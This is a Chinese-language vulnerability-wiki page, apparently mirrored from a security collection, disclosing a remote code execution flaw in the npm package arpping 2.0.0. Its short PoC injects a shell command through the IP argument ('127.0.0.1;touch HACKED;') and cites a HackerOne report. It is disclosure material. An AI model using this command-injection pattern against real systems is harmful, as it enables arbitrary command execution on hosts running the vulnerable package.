menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right --Vulnerability-main chevron_right arpping 2.0.0 远程代码执行(RCE).md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    arpping 2.0.0 远程代码执行(RCE).md
    476 B / 2021-05-21 09:14:38
        # arpping 2.0.0 远程代码执行(RCE)
    
    arpping是一个软件包,使用ping和arp查找并搜索与Internet连接的设备(本地)。
    
    npm页面: https://www.npmjs.com/package/arpping
    
    **PoC:**
    
    创建一个index.js
    
    ```js
    const Arpping = require('arpping');
    
    var arpping = new Arpping();
    arpping.ping(["127.0.0.1;touch HACKED;"]); // arpping.arp(["127.0.0.1; touch HACKED;"]);
    ```
    
    ![](images/16111463128724.jpg)
    
    
    ref:
    
    https://hackerone.com/reports/972220
    
    links
    file_download